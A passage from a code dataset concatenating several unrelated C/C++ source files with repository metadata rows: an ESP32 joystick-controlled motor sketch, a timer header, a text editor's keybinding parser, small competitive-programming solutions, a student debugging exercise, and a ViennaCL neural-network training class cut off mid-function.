#define MotorPIN 21
#define MotorPIN_Direction 22
#define ServoPIN 33
#define MotorFREQ 5000
#define ServoFREQ 60
#define LEDC_RESOLUTION_BITS 12
#define LEDC_RESOLUTION ((1<<LEDC_RESOLUTION_BITS)-1)
#define servoMin 0.045
#define servoMax 0.08
#define motorMin 0
#define motorMax 1
//initialize neccesary params
int SpeedMotor, DirectionServo,DirectionMotor;
// finds the duty cycle given the maximum and minimum allowed duty cycle
float FindDuty(int Value, float Min,float Max){
int duty=Value;
int Minimum=duty*Min;
int Maximum=duty*Max;
if(duty>=Maximum){
duty=Maximum;
}
else if(duty<=Minimum){
duty=Minimum;
}
return duty;
}
void updateMotors() {
ledcWrite(Speed_CHANNEL1,FindDuty(SpeedMotor, motorMin,motorMax)); // write duty to LEDC
ledcWrite(Direction_CHANNEL0,FindDuty(DirectionServo,servoMin,servoMax)); // write duty to LEDC
if(DirectionMotor<0){
digitalWrite(MotorPIN_Direction, LOW);
}
else if(DirectionMotor>=0){
digitalWrite(MotorPIN_Direction, HIGH);
}
}
/************************/
/* joystick mode code */
int x,y;
void handleJoy() {
int Speed, Direction;
x = getVal(); // from -50 to +50
y = getVal();
String s = String(x) + "," + String(y);
Speed = y;
Direction = x;
//determines the speed of the motor
SpeedMotor = map(Speed, -50, 50, -1*LEDC_RESOLUTION, LEDC_RESOLUTION);
if(SpeedMotor>=0){
DirectionMotor=-1;
}
else{
DirectionMotor=1;
SpeedMotor=SpeedMotor*-1;
}
//determines direction of servor
DirectionServo = map(Direction, -50, 50, 0, LEDC_RESOLUTION);
sendplain(s);
Serial.printf("received X,Y:=%d,%d\n",x,y);
}
void setup()
{
Serial.begin(115200);
WiFi.mode(WIFI_MODE_STA);
WiFi.begin(ssid, password);
//Upenn wifi
/*
WiFi.config(IPAddress(192, 168, 43, 109), // change the last number to your assigned number
IPAddress(192, 168, 43, 1),
IPAddress(255, 255, 255, 0));
*/
//home Wifi
WiFi.config(IPAddress(192, 168, 1, 109),
IPAddress(192, 168, 1, 1),
IPAddress(255, 255, 255, 0));
while(WiFi.status()!= WL_CONNECTED ) {
delay(500); Serial.print(".");
}
Serial.println("WiFi connected");
Serial.printf("Use this URL http://%s/\n",WiFi.localIP().toString().c_str());
server.begin(); //Start server
// Motor initialization
pinMode(MotorPIN_Direction , OUTPUT);
pinMode(MotorPIN,OUTPUT);
pinMode(ServoPIN,OUTPUT);
ledcSetup(Direction_CHANNEL0, ServoFREQ, LEDC_RESOLUTION_BITS); // channel, freq, bits
ledcAttachPin(ServoPIN, Direction_CHANNEL0);
ledcSetup(Speed_CHANNEL1, MotorFREQ, LEDC_RESOLUTION_BITS); // channel, freq, bits
ledcAttachPin(MotorPIN, Speed_CHANNEL1);
// HTML510 initialization
attachHandler("/joy?val=",handleJoy);
body = joybody;
attachHandler("/favicon.ico",handleFavicon);
attachHandler("/ ",handleRoot);
}
void loop()
{
static long lastWebCheck = millis();
static long lastMotorUpdate = millis();
uint32_t ms;
ms = millis();
if (ms-lastWebCheck > 2){
serve(server,body);
lastWebCheck = ms;
}
if (ms-lastMotorUpdate > 1000/MotorFREQ) {
updateMotors();
lastMotorUpdate = ms;
}
}
|
4fc3387e13475595f82745d69d392c64dabde525 | b607256cc66737dbcad4e02e31a8344e3443368a | /KFC_Common/timer.h | 66d25f3bc17ab3c6fdac3889edb840406e049438 | [] | no_license | Harkonnen604/KFC | c62b9325a1ddfdd23f81fe5a1a2a4a320a07e4dc | ff03c9122edea10438963488feab9405ee556e28 | refs/heads/master | 2021-06-27T05:30:44.410246 | 2020-09-28T19:24:31 | 2020-09-28T19:24:31 | 156,101,719 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,094 | h | timer.h | #ifndef timer_h
#define timer_h
#include <KFC_KTL/suspendable.h>
// Immediate time
#define IMMEDIATE_TIME (1)
// ------
// Timer
// ------
class TTimer : public TSuspendable
{
private:
bool m_bAllocated;
QWORD m_qwLastStartTime;
QWORD m_qwAccumulatedTime;
float m_fSpeedCoef;
bool OnSuspend ();
bool OnResume ();
public:
TTimer(bool bAllocate = false, QWORD qwSStartTime = -1);
~TTimer()
{ Release(); }
bool IsAllocated() const
{ return m_bAllocated; }
void Release();
void Allocate(QWORD qwSStartTime = -1);
void Reset(QWORD qwSStartTime = -1);
void SetSpeedCoef(float fSSpeedCoef, QWORD qwCurTime = -1);
QWORD GetElapsedTime(QWORD qwCurTime = -1) const;
operator QWORD () const
{ return (QWORD)GetElapsedTime(); }
// ---------------- TRIVIALS ----------------
QWORD GetLastStartTime () const { return m_qwLastStartTime; }
QWORD GetAccumulatedTime() const { return m_qwAccumulatedTime; }
float GetSpeedCoef() const { return m_fSpeedCoef; }
};
#endif // timer_h
|
ed856476e8e4044aa9361dfa36aa83aa0ed6e305 | 882bb5de5359bf8e3d4fc2783a21d7a7265aa122 | /settings/keybindings.cpp | d986a8173caa7ec686f5a38828f5abbd5284ddfc | [
"Apache-2.0"
] | permissive | rohankumardubey/Panther | 73b172478a1e6626fd8710b9b4d42654ffa36632 | 1eac47074aa33ba747140950f373c9b7dd7f3d67 | refs/heads/master | 2023-03-15T21:31:46.703436 | 2018-01-25T14:06:56 | 2018-01-25T14:06:56 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 14,511 | cpp | keybindings.cpp |
#include "keybindings.h"
#include "controlmanager.h"
#include "textfield.h"
#include "tabcontrol.h"
#include "simpletextfield.h"
#include "findtext.h"
#include "goto.h"
#include "searchbox.h"
#include "projectexplorer.h"
#include "json.h"
#include "default-keybindings.h"
using namespace nlohmann;
PGKeyBindingsManager::PGKeyBindingsManager() {
// initialize all keybindings
BasicTextField::InitializeKeybindings();
ControlManager::InitializeKeybindings();
SimpleTextField::InitializeKeybindings();
TabControl::InitializeKeybindings();
TextField::InitializeKeybindings();
PGFindText::InitializeKeybindings();
PGGotoAnything::InitializeKeybindings();
SearchBox::InitializeKeybindings();
ProjectExplorer::InitializeKeybindings();
LoadSettingsFromData(PANTHER_DEFAULT_KEYBINDINGS);
}
void ExtractModifier(std::string& keys, PGModifier& modifier, std::string modifier_text, PGModifier added_modifier) {
size_t pos = keys.find(modifier_text.c_str());
if (pos != std::string::npos) {
modifier |= added_modifier;
keys = keys.erase(pos, modifier_text.size());
}
}
bool PGKeyBindingsManager::ParseKeyPress(std::string keys, PGKeyPress& keypress) {
PGModifier modifier = PGModifierNone;
ExtractModifier(keys, modifier, "ctrl+", PGModifierCtrl);
ExtractModifier(keys, modifier, "shift+", PGModifierShift);
ExtractModifier(keys, modifier, "alt+", PGModifierAlt);
ExtractModifier(keys, modifier, "option+", PGModifierAlt);
ExtractModifier(keys, modifier, "cmd+", PGModifierCmd);
ExtractModifier(keys, modifier, "super+", PGModifierCmd);
keypress.modifier = modifier;
if (keys.size() == 1) {
// character
char c = keys[0];
if (c >= 33 && c <= 126) {
keys = panther::toupper(keys);
keypress.character = keys[0];
return true;
} else {
return false;
}
} else {
if (keys == "insert") {
keypress.button = PGButtonInsert;
} else if (keys == "home") {
keypress.button = PGButtonHome;
} else if (keys == "pageup") {
keypress.button = PGButtonPageUp;
} else if (keys == "pagedown") {
keypress.button = PGButtonPageDown;
} else if (keys == "delete") {
keypress.button = PGButtonDelete;
} else if (keys == "end") {
keypress.button = PGButtonEnd;
} else if (keys == "printscreen") {
keypress.button = PGButtonPrintScreen;
} else if (keys == "scrolllock") {
keypress.button = PGButtonScrollLock;
} else if (keys == "break") {
keypress.button = PGButtonPauseBreak;
} else if (keys == "escape") {
keypress.button = PGButtonEscape;
} else if (keys == "tab") {
keypress.button = PGButtonTab;
} else if (keys == "capslock") {
keypress.button = PGButtonCapsLock;
} else if (keys == "f1") {
keypress.button = PGButtonF1;
} else if (keys == "f2") {
keypress.button = PGButtonF2;
} else if (keys == "f3") {
keypress.button = PGButtonF3;
} else if (keys == "f4") {
keypress.button = PGButtonF4;
} else if (keys == "f5") {
keypress.button = PGButtonF5;
} else if (keys == "f6") {
keypress.button = PGButtonF6;
} else if (keys == "f7") {
keypress.button = PGButtonF7;
} else if (keys == "f8") {
keypress.button = PGButtonF8;
} else if (keys == "f9") {
keypress.button = PGButtonF9;
} else if (keys == "f10") {
keypress.button = PGButtonF10;
} else if (keys == "f11") {
keypress.button = PGButtonF11;
} else if (keys == "f12") {
keypress.button = PGButtonF12;
} else if (keys == "numlock") {
keypress.button = PGButtonNumLock;
} else if (keys == "down") {
keypress.button = PGButtonDown;
} else if (keys == "up") {
keypress.button = PGButtonUp;
} else if (keys == "left") {
keypress.button = PGButtonLeft;
} else if (keys == "right") {
keypress.button = PGButtonRight;
} else if (keys == "backspace") {
keypress.button = PGButtonBackspace;
} else if (keys == "enter") {
keypress.button = PGButtonEnter;
} else {
return false;
}
return true;
}
return false;
}
bool PGKeyBindingsManager::ParseMousePress(std::string keys, PGMousePress& keypress) {
PGModifier modifier = PGModifierNone;
ExtractModifier(keys, modifier, "ctrl+", PGModifierCtrl);
ExtractModifier(keys, modifier, "shift+", PGModifierShift);
ExtractModifier(keys, modifier, "alt+", PGModifierAlt);
ExtractModifier(keys, modifier, "option+", PGModifierAlt);
ExtractModifier(keys, modifier, "cmd+", PGModifierCmd);
ExtractModifier(keys, modifier, "super+", PGModifierCmd);
keypress.modifier = modifier;
// FIXME: support other mouse buttons
if (keys == "left") {
keypress.button = PGLeftMouseButton;
} else if (keys == "right") {
keypress.button = PGRightMouseButton;
} else if (keys == "middle") {
keypress.button = PGMiddleMouseButton;
} else {
return false;
}
return true;
}
#define INITIALIZE_CONTROL(control) \
functions = &(control::keybindings); \
keybindings_noargs = &(control::keybindings_noargs); \
keybindings_varargs = &(control::keybindings_varargs); \
mousebindings_noargs = &(control::mousebindings_noargs); \
mousebindings = &(control::mousebindings)
std::string ParseEscapeCharacters(std::string str) {
if (str.size() == 0) return "";
char* temporary_buffer = (char*) malloc((str.size() + 1) * sizeof(char));
if (!temporary_buffer) {
return "";
}
lng index = 0;
size_t i;
for (i = 0; i < str.size() - 1; i++) {
if (str[i] == '\\') {
if (str[i + 1] == 'n') {
temporary_buffer[index++] = '\n';
i++;
} else if (str[i + 1] == '\\') {
temporary_buffer[index++] = '\\';
i++;
} else if (str[i + 1] == 't') {
temporary_buffer[index++] = '\t';
i++;
}
} else {
temporary_buffer[index++] = str[i];
}
}
if (i == str.size() - 1) {
temporary_buffer[index++] = str[str.size() - 1];
}
std::string result = std::string(temporary_buffer, index);
free(temporary_buffer);
return result;
}
void PGKeyBindingsManager::LoadSettingsFromData(const char* data) {
json j;
//try {
j = json::parse(data);
/*} catch(...) {
return;
}*/
for (auto it = j.begin(); it != j.end(); it++) {
if (it.value().is_array()) {
std::string control = panther::tolower(it.key());
auto keys = it.value();
std::map<PGKeyPress, PGKeyFunctionCall>* functions = nullptr;
std::map<std::string, PGKeyFunction>* keybindings_noargs = nullptr;
std::map<std::string, PGKeyFunctionArgs>* keybindings_varargs = nullptr;
std::map<std::string, PGMouseFunction>* mousebindings_noargs = nullptr;
std::map<PGMousePress, PGMouseFunctionCall>* mousebindings = nullptr;
if (control == "global") {
INITIALIZE_CONTROL(ControlManager);
} else if (control == "textfield") {
INITIALIZE_CONTROL(TextField);
} else if (control == "simpletextfield") {
INITIALIZE_CONTROL(SimpleTextField);
} else if (control == "basictextfield") {
INITIALIZE_CONTROL(BasicTextField);
} else if (control == "tabcontrol") {
INITIALIZE_CONTROL(TabControl);
} else if (control == "findtext") {
INITIALIZE_CONTROL(PGFindText);
} else if (control == "goto") {
INITIALIZE_CONTROL(PGGotoAnything);
} else if (control == "searchbox") {
INITIALIZE_CONTROL(SearchBox);
} else if (control == "projectexplorer") {
INITIALIZE_CONTROL(ProjectExplorer);
}
if (functions && keybindings_noargs && keybindings_varargs) {
for (auto key = keys.begin(); key != keys.end(); key++) {
auto keybinding = key.value();
bool mouse = false;
if (keybinding.find("key") == keybinding.end()) {
// no key found
if (keybinding.find("mouse") == keybinding.end()) {
// no mouse found
continue;
} else {
// mouse command
mouse = true;
}
}
if (keybinding.find("command") == keybinding.end()) {
// no command found
continue;
}
if (!mouse) {
// regular keypress
std::string keys = panther::tolower(keybinding["key"]);
std::string command = panther::tolower(keybinding["command"]);
// parse the key
PGKeyPress keypress;
if (!ParseKeyPress(keys, keypress)) {
// could not parse key press
continue;
}
PGKeyFunctionCall function;
if (keybinding.find("args") == keybinding.end()) {
// command without args
if (keybindings_noargs->count(command) != 0) {
function.has_args = false;
function.function = (void*)(*keybindings_noargs)[command];
} else {
// command not found
continue;
}
} else {
// command with args
if (keybindings_varargs->count(command) != 0) {
function.has_args = true;
function.function = (void*)(*keybindings_varargs)[command];
auto args = keybinding["args"];
for (auto arg = args.begin(); arg != args.end(); arg++) {
function.arguments[arg.key()] = ParseEscapeCharacters(StripQuotes(arg.value().dump()));
}
} else {
// command not found
continue;
}
}
(*functions)[keypress] = function;
} else {
// mouse button press
std::string keys = panther::tolower(keybinding["mouse"]);
std::string command = panther::tolower(keybinding["command"]);
int clicks = keybinding.find("clicks") == keybinding.end() ? 0 : ((int)keybinding["clicks"]) - 1;
clicks = std::abs(clicks);
// parse the key
PGMousePress mousepress;
if (!ParseMousePress(keys, mousepress)) {
// could not parse mouse button press
continue;
}
mousepress.clicks = clicks;
PGMouseFunctionCall function;
if (mousebindings_noargs->count(command) != 0) {
function.function = (void*)(*mousebindings_noargs)[command];
} else {
// command not found
continue;
}
(*mousebindings)[mousepress] = function;
}
}
} else {
// FIXME: unrecognized control type
}
}
}
}
void PGKeyBindingsManager::LoadSettings(std::string filename) {
lng result_size;
PGFileError error;
char* ptr = (char*)panther::ReadFile(filename, result_size, error);
if (!ptr) {
assert(0);
return;
}
LoadSettingsFromData(ptr);
panther::DestroyFileContents(ptr);
}
std::string PGButtonToString(PGButton button) {
switch (button) {
case PGButtonInsert: return "Insert";
case PGButtonHome: return "Home";
case PGButtonPageUp: return "PageUp";
case PGButtonPageDown: return "PageDown";
case PGButtonDelete: return "Delete";
case PGButtonEnd: return "End";
case PGButtonPrintScreen: return "PrintScreen";
case PGButtonScrollLock: return "ScrollLock";
case PGButtonPauseBreak: return "PauseBreak";
case PGButtonEscape: return "Escape";
case PGButtonTab: return "Tab";
case PGButtonCapsLock: return "CapsLock";
case PGButtonF1: return "F1";
case PGButtonF2: return "F2";
case PGButtonF3: return "F3";
case PGButtonF4: return "F4";
case PGButtonF5: return "F5";
case PGButtonF6: return "F6";
case PGButtonF7: return "F7";
case PGButtonF8: return "F8";
case PGButtonF9: return "F9";
case PGButtonF10: return "F10";
case PGButtonF11: return "F11";
case PGButtonF12: return "F12";
case PGButtonNumLock: return "NumLock";
case PGButtonDown: return "Down";
case PGButtonUp: return "Up";
case PGButtonLeft: return "Left";
case PGButtonRight: return "Right";
case PGButtonBackspace: return "Backspace";
case PGButtonEnter: return "Enter";
default: return "";
}
}
std::string PGKeyPress::ToString() const {
std::string text = "";
if (this->modifier & PGModifierCtrl) {
text += "Ctrl+";
}
if (this->modifier & PGModifierShift) {
text += "Shift+";
}
if (this->modifier & PGModifierAlt) {
text += "Alt+";
}
if (this->modifier & PGModifierCmd) {
text += "Cmd+";
}
if (this->character) {
text += panther::toupper(std::string(1, this->character));
} else {
text += PGButtonToString(this->button);
}
return text;
}
void PGPopupMenuInsertCommand(PGPopupMenuHandle menu,
std::string command_text,
std::string command_name,
std::map<std::string, PGKeyFunction>& keybindings_noargs,
std::map<PGKeyPress, PGKeyFunctionCall>& keybindings,
std::map<std::string, PGBitmapHandle>& images,
PGPopupMenuFlags flags,
PGPopupCallback callback,
PGPopupMenuHandle main_menu) {
// look for the command
if (keybindings_noargs.count(command_name) <= 0) return; // command not found
PGKeyFunction command = keybindings_noargs[command_name];
// look for the hotkey
std::string hotkey = "";
for (auto it = keybindings.begin(); it != keybindings.end(); it++) {
if ((PGKeyFunction) it->second.function == command) {
hotkey = it->first.ToString();
break;
}
}
PGBitmapHandle image = nullptr;
if (images.count(command_name) > 0) {
image = images[command_name];
}
auto info = PGPopupInformation(menu, command_text, hotkey, image, (void*) command);
info.menu_handle = main_menu;
PGPopupMenuInsertEntry(menu, info,
callback ? callback :
[](Control* control, PGPopupInformation* info) {
((PGKeyFunction)info->pdata)(control);
}, flags);
}
struct PGArgsInformation {
PGKeyFunctionArgs command;
std::map<std::string, std::string> args;
};
void PGPopupMenuInsertCommandWithArgs(PGPopupMenuHandle menu,
std::string command_text,
std::string command_name,
std::map<std::string, PGKeyFunctionArgs>& keybindings_args,
std::map<PGKeyPress, PGKeyFunctionCall>& keybindings,
std::map<std::string, PGBitmapHandle>& images,
std::map<std::string, std::string> args,
PGPopupMenuFlags flags,
PGPopupCallback callback,
PGPopupMenuHandle main_menu) {
// look for the command
if (keybindings_args.count(command_name) <= 0) return; // command not found
PGKeyFunctionArgs command = keybindings_args[command_name];
// look for the hotkey
std::string hotkey = "";
for (auto it = keybindings.begin(); it != keybindings.end(); it++) {
if ((PGKeyFunctionArgs) it->second.function == command) {
hotkey = it->first.ToString();
break;
}
}
PGBitmapHandle image = nullptr;
if (images.count(command_name) > 0) {
image = images[command_name];
}
PGArgsInformation* args_info = new PGArgsInformation();
args_info->command = command;
args_info->args = args;
auto info = PGPopupInformation(menu, command_text, hotkey, image, (void*) args_info);
info.menu_handle = main_menu;
// FIXME: this leaks PGArgsInformation
PGPopupMenuInsertEntry(menu, info,
callback ? callback :
[](Control* control, PGPopupInformation* info) {
PGArgsInformation* args_info = (PGArgsInformation*)info->pdata;
args_info->command(control, args_info->args);
}, flags);
}
|
1e4c855fdeed6abfb67a82cfda85e2761e26ed55 | e45026c3d9aeec954bc6a52729e0166212471859 | /luogu/p1087/p1087.cpp | d8c79944a7fd1036f709ac95fb75095c3cb33219 | [] | no_license | refervl/PracticeCode | 1b972e6d264e9862afef927f6f5bc7b1a4f5f78f | 25688ba710f3b47c364b20fcb0f7b07deb2587c6 | refs/heads/master | 2020-07-06T21:00:52.922996 | 2019-08-24T14:00:56 | 2019-08-24T14:00:56 | 203,136,354 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 878 | cpp | p1087.cpp | #include<iostream>
#include<cstring>
#include<cmath>
#include<algorithm>
#include<queue>
#include<vector>
#include<cstdio>
#include<stack>
#include<map>
#include<set>
using namespace std;
#define For(i,a,b) for(int (i)= (a);i<(b);++i)
#define rep(i,a,b) for(int (i) = (a);i<=(b);++i)
#define ll long long
#define INI(x) memset(x,0,sizeof(x))
#define R(x) scanf("%d",&x)
#define W(x) printf("%d\n",x)
#define Rll(x) scanf("%lld",&x)
#define Wll(x) printf("%lld\n",x)
#define pb push_back
char a[1055];
void solve(int l,int r){
if(r>l){
solve(l,(l+r)>>1);
solve((l+r+1)>>1,r);
}
int b=0,I=0;
rep(i,0,r-l){
if(a[l+i]=='0') b = 1;
else I = 1;
}
if(b&&!I) cout<<'B';
else if(I&&!b) cout<<'I';
else cout<<'F';
}
int main(){
int n;
cin>>n;
cin>>a;
solve(0,(1<<n)-1);
cout<<endl;
return 0;
} |
6f59d5b722801044ce0cc14352247616c50e5973 | 20cf028a57ec7e7a3a020cbc8b11daac99319c31 | /Set4/L4C/main.cpp | 80e5c09e1f4a49c7f8b5385efd2b30390eae1533 | [] | no_license | carolinearndt/CSCI261F18 | a72bd97fd2b48b71fbf915f7b6e9342ffd54ba25 | 7327868a851d1058e4738816ff9da3df586bc233 | refs/heads/master | 2020-04-23T01:01:09.684395 | 2019-02-15T04:05:08 | 2019-02-15T04:05:08 | 170,799,875 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 5,242 | cpp | main.cpp | /* CSCI 261: Fix Function Errors
*
* Author: Caroline Arndt
*
* This program illustrates a variety of common loop errors.
* Fix the errors in each section.
Copyright 2018 Dr. Jeffrey Paone
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
*/
#include <cstdlib>
#include <ctime>
#include <iostream>
using namespace std;
// input: integer
// output: none
// adds five to the given parameter
void addFive( int &x ) {
x += 5;
}
// input: none
// output: a random number
int generateRandomNumber() {
return rand() % 100;
}
// input: three integers
// output: the sum of all three parameters
int sum( int x, int y, int z ) {
return x + y + z;
}
// input: two doubles
// output: the product of the two doubles
double multiply( double a, double b ){
return a * b;
}
void printSmileyFace(){
cout << ":)" << endl;
}
int main() {
cout << "Welcome to Function World" << endl;
// SECTION I: update comment below on how you fixed this section's code, and tests run
// that show function is working properly
// FIX = function needs to pass sby reference, not by value.
// TESTS:
cout << endl;
cout << "******************" << endl;
cout << "Section I" << endl;
cout << "******************" << endl;
int numTrees = 4;
cout << "There are initially " << numTrees << " trees." << endl;
addFive( numTrees );
cout << "We planted five trees, there are now " << numTrees << " trees." << endl;
// SECTION II: update comment below on how you fixed this section's code, and tests run
// that show function is working properly
// FIX = There was no function defined before for printSmileyFace. There is now a function that prints a face.
// TESTS: function should print ":)" when called.
cout << endl;
cout << "******************" << endl;
cout << "Section II" << endl;
cout << "******************" << endl;
printSmileyFace();
// SECTION III: update comment below on how you fixed this section's code, and tests run
// that show function is working properly
// FIX = srand needs to be outside the loop.
// TESTS: instead of printing 5 of the same numbers, they should now all be different.
cout << endl;
cout << "******************" << endl;
cout << "Section III" << endl;
cout << "******************" << endl;
cout << "Five different random numbers are: " << endl;
srand(time(0));
for( int i = 0; i < 5; i++ ) {
cout << "\t" << generateRandomNumber() << endl;
}
// SECTION IV: update comment below on how you fixed this section's code, and tests run
// that show function is working properly
// FIX = changed return value from "x+x+x" to "x+y+z". also needs to be changed to sum(num1, num2, num3).
// TESTS:
cout << endl;
cout << "******************" << endl;
cout << "Section IV" << endl;
cout << "******************" << endl;
int num1, num2, num3;
cout << "Enter three numbers: ";
cin >> num1 >> num2 >> num3;
cout << "The sum of all three is " << sum( num1, num2, num3 ) << endl;
// SECTION V: update comment below on how you fixed this section's code, and tests run
// that show function is working properly
// FIX = forgot the (). changed to generateRandomNumber().
// TESTS:
cout << endl;
cout << "******************" << endl;
cout << "Section V" << endl;
cout << "******************" << endl;
cout << "Another random number is " << generateRandomNumber() << endl;
// SECTION VI: update comment below on how you fixed this section's code, and tests run
// that show function is working properly
// FIX = function had no return value. now returns the product of the two numbers passed in by value.
// TESTS:
cout << endl;
cout << "******************" << endl;
cout << "Section VI" << endl;
cout << "******************" << endl;
double doub1, doub2;
cout << "Enter two doubles: ";
cin >> doub1 >> doub2;
cout << "Their product is: " << multiply( doub1, doub2 ) << endl;
cout << endl;
cout << "******************" << endl;
cout << "Section Done" << endl;
cout << "******************" << endl;
cout << endl << "Congrats! You fixed them all (hopefully correctly!)" << endl << endl << "Goodbye" << endl << endl;
return 0;
}
|
d91cefccd57efbb0665273b293009e5150fd6100 | 155ff8c9ee629d385033f6f8905a55dffeeba46b | /Codeforces/381.cpp | 745034118050c1189d4de447d82439138e047c3c | [] | no_license | Rvk1605/CP | 29e9121456ef434b65d55e2c6a3e82ca1d3ccb26 | d522e2dd5db6d6c4c572ba98423d1973047f723f | refs/heads/main | 2023-02-07T08:11:35.677533 | 2021-01-01T08:23:07 | 2021-01-01T08:23:07 | 325,941,897 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 445 | cpp | 381.cpp | #include<Iostream>
using namespace std;
int main()
{
int n,sum1=0,sum2=0;
cin>>n;
int a[n],j=n-1,k=0;
for(int i=0;i<n;i++)
{
cin>>a[i];
}
for(int i=0;i<n;i++)
{
if(i%2==0)
{
if(a[k]>a[j])
sum1+=a[k++];
else
sum1+=a[j--];
}
else
{
if(a[k]>a[j])
sum2+=a[k++];
else
sum2+=a[j--];
}
}
cout<<sum1<<" ";
cout<<sum2;
}
|
ee567e99321aefac8fd2f1be2d58f73e09682213 | 262d20f41168a32473714a489d94f8c17e9b41d7 | /src/model/MGD_VCL_MLP.h | bd7789aacfb70524bad882f6dc051a9467a7aabb | [] | no_license | YMA33/GradientDescent | 853172f731aaa1ddabe4430f3329b4c5090295fa | 3837e552ec99523ca9f4bf35a1e69f2478c1ee9b | refs/heads/master | 2020-05-24T18:24:24.403977 | 2019-05-23T06:12:21 | 2019-05-23T06:12:21 | 187,409,653 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 10,553 | h | MGD_VCL_MLP.h | #ifndef MODEL_MGD_VCL_MLP_H_
#define MODEL_MGD_VCL_MLP_H_
#include <stdio.h>
#include <math.h>
#include <random>
#include "../util/Timer.h"
#include "../util/InputData.h"
#include "../util/HyperPara.h"
#include "../util/NeuralNets.h"
#include "../train/train_vcl.h"
using std::default_random_engine;
using std::uniform_real_distribution;
using std::normal_distribution;
using std::cout;
using std::endl;
class MGD_VCL_MLP{
public:
InputData* input_data;
HyperPara* hyper_para;
NeuralNets* neural_nets;
vector<viennacl::matrix<double, viennacl::row_major> > vc_mgd_weight;
vector<vector<viennacl::matrix<double, viennacl::row_major> > > vc_mgd_gradient;
vector<vector<viennacl::matrix<double, viennacl::row_major> > > vc_mgd_y;
vector<viennacl::matrix<double, viennacl::row_major> > vc_mgd_label;
vector<vector<viennacl::matrix<double> > > dloss_dy;
vector<vector<viennacl::matrix<double> > > dloss_dx;
double stepsize;
double loss;
double forward_time;
double backprop_time;
Timer mgd_timer;
MGD_VCL_MLP(int num_tuples, int gradient_size, int num_classes, char* filename,
int num_threads, int batch_size, double decay, double N_0, int iterations, int seed,
int num_layers, vector<int>& units);
~MGD_VCL_MLP();
void load_data();
void init_model(int c_init);
double get_loss();
double get_loss_para();
void train();
void compute_gradient(int batch_idx, int processed_tuples);
void update_model();
void forward(int batch_idx, int processed_tuples);
};
MGD_VCL_MLP::MGD_VCL_MLP(int n_tuples, int grad_size, int n_classes, char* fname,
int n_threads, int b_size, double d, double N, int iter, int s,
int n_layers, vector<int>& units){
input_data = new InputData(n_tuples, grad_size, n_classes, fname);
hyper_para = new HyperPara(n_threads, b_size, d, N, iter, s);
neural_nets = new NeuralNets(n_layers, units);
hyper_para->num_batches = input_data->num_tuples/hyper_para->batch_size + 1;
hyper_para->tuples_last_batch = input_data->num_tuples - (hyper_para->num_batches-1)*hyper_para->batch_size;
if(hyper_para->tuples_last_batch==0){
hyper_para->num_batches--;
hyper_para->last_batch_processed = false;
}
//cout<<"num_batches: " << hyper_para->num_batches
// <<", #tuples in last batch: "<< hyper_para->tuples_last_batch<<endl;
vc_mgd_weight.resize(neural_nets->num_grad);
vc_mgd_gradient.resize(hyper_para->num_batches);
vc_mgd_y.resize(hyper_para->num_batches);
vc_mgd_label.resize(hyper_para->num_batches);
dloss_dy.resize(hyper_para->num_batches);
dloss_dx.resize(hyper_para->num_batches);
#pragma omp parallel for schedule(dynamic)
for(int i = 0; i < hyper_para->num_batches; i++){
int processed_tuples = hyper_para->batch_size;
if( i == hyper_para->num_batches-1 && hyper_para->last_batch_processed)
processed_tuples = hyper_para->tuples_last_batch;
vc_mgd_label[i] = viennacl::matrix<double,viennacl::row_major>(processed_tuples, input_data->num_classes);
vc_mgd_y[i].resize(neural_nets->num_layers);
vc_mgd_y[i][0] = viennacl::matrix<double, viennacl::row_major>(processed_tuples, input_data->gradient_size);
dloss_dy[i].resize(neural_nets->num_grad);
dloss_dx[i].resize(neural_nets->num_grad);
}
stepsize = N;
loss = 0.;
forward_time = 0.;
backprop_time = 0.;
}
MGD_VCL_MLP::~MGD_VCL_MLP(){
delete input_data;
delete hyper_para;
delete neural_nets;
}
void MGD_VCL_MLP::load_data(){
char str[1000];
double val, y_val;
vector<double>* mgd_data = new vector<double>[hyper_para->num_batches];
vector<double>* mgd_label = new vector<double>[hyper_para->num_batches];
mgd_timer.Restart();
FILE *file = fopen(input_data->filename, "r");
for(int i = 0; i < hyper_para->num_batches; i++){
mgd_data[i].resize(vc_mgd_y[i][0].internal_size(), 0.);
mgd_label[i].resize(vc_mgd_label[i].internal_size(), 0.);
//for(int j = 0; j < vc_mgd_y[i][0].internal_size(); j++) mgd_data[i].push_back(0.);
//for(int j = 0; j < vc_mgd_label[i].internal_size(); j++) mgd_label[i].push_back(0.);
for(int j = 0; j< hyper_para->batch_size
&& i*hyper_para->batch_size+j< input_data->num_tuples; j++){
fscanf(file, "%lf", &y_val);
if(y_val == -1.){ // [1,0]
mgd_label[i][viennacl::row_major::mem_index(
j,0,vc_mgd_label[i].internal_size1(),vc_mgd_label[i].internal_size2())] = 1.;
mgd_label[i][viennacl::row_major::mem_index(
j,1,vc_mgd_label[i].internal_size1(), vc_mgd_label[i].internal_size2())] = 0.;
} else{ // [0,1]
mgd_label[i][viennacl::row_major::mem_index(
j,0,vc_mgd_label[i].internal_size1(), vc_mgd_label[i].internal_size2())] = 0.;
mgd_label[i][viennacl::row_major::mem_index(
j,1,vc_mgd_label[i].internal_size1(), vc_mgd_label[i].internal_size2())] = 1.;
}
for(int k = 0; k < input_data->gradient_size; k++){
fscanf(file, ",%lf", &val);
